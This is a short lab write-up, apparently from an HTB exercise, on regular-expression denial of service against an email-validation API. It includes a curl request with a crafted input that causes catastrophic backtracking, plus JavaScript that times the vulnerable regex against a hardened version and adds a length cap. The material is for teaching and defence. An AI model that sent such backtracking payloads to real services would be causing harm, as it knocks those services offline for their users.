Regular Expression Denial of Service (ReDoS)

Suppose a user submits input to an API. On the server side, the developer matches that input against a regular expression. If the expression contains nested, overlapping quantifiers, a crafted input can force the engine into catastrophic backtracking, so that a single request consumes seconds of CPU time.

Interact with the API

curl "http://<TARGET IP>:3000/api/check-email?email=test_value"
{"regex":"/^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/","success":false}

Credits HTB

Submit a longer string

curl "http://<TARGET IP>:3000/api/check-email?email=tessssssssssssssssssssssssssssssttttttt@cdddddddddddddddddddddddddddddddddd.2222222222222222222222222222222222222222222222222222222222."
{"regex":"/^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/","success":false}

You'll notice a significant delay in the response. The delay grows with the length of the input, which shows the regex backtracks catastrophically and the API is vulnerable to ReDoS attacks.
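The lab's regex beside a hardened one, as an added example (JavaScript, since the target is a Node API on port 3000; this is not code from the lab or from HTB). The function names, the 254-character cap and the constructed inputs are assumptions.

```javascript
// Added example, not code from the HTB lab: the lab's regex beside a hardened
// validator and a length cap. Cap value and function names are assumptions.
// Copied verbatim from the API response shown above.
const VULNERABLE_RE = /^([a-zA-Z0-9_.-])+@(([a-zA-Z0-9-])+.)+([a-zA-Z0-9]{2,4})+$/;

// Hardened form: the unescaped "." matched any character, so label runs could
// be split between "[a-zA-Z0-9-]+" and "." in exponentially many ways; with
// "\." each group ends at a literal dot. The spurious "+" after the TLD is gone.
const SAFE_RE = /^[a-zA-Z0-9_.-]+@(?:[a-zA-Z0-9-]+\.)+[a-zA-Z0-9]{2,4}$/;

// Assumed server-side cap (RFC 5321 bounds an address at 254 characters).
const MAX_EMAIL_LEN = 254;

// What the endpoint should do: reject on length before touching any regex.
function checkEmail(email) {
  if (typeof email !== "string" || email.length > MAX_EMAIL_LEN) {
    return { success: false, reason: "too long" };
  }
  return { success: SAFE_RE.test(email), reason: null };
}

// Non-matching input shaped like the page's payload: a long digit label ending
// in a dot, so failure comes only after every split of the digits is tried.
function attackInput(n) {
  return "test@x" + "1".repeat(n) + ".";
}

// Inputs on which the two patterns disagree; the vulnerable one accepts
// every one of these, so the rewrite also tightens validation, not just speed.
function disagreements(inputs) {
  return inputs.filter((s) => VULNERABLE_RE.test(s) !== SAFE_RE.test(s));
}

// Wall-clock cost of one match attempt, in milliseconds.
function matchMillis(re, input) {
  const start = process.hrtime.bigint();
  re.test(input);
  return Number(process.hrtime.bigint() - start) / 1e6;
}

if (typeof require !== "undefined" && require.main === module) {
  for (const n of [20, 24, 28]) { // time grows exponentially in n for VULNERABLE_RE
    const v = matchMillis(VULNERABLE_RE, attackInput(n)).toFixed(1);
    const s = matchMillis(SAFE_RE, attackInput(n)).toFixed(3);
    console.log(`n=${n} vulnerable=${v}ms hardened=${s}ms`);
  }
  console.log(disagreements(["user@examplecom", "user@example.toolong", "user@exa mple.com"]));
  console.log(checkEmail("user@example.com"), checkEmail(attackInput(300)));
}
```

Run it with `node` to see the vulnerable timing climb with n while the hardened pattern stays flat; the disagreement list shows the original regex also accepted addresses with no dot, an over-long TLD, or a space.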
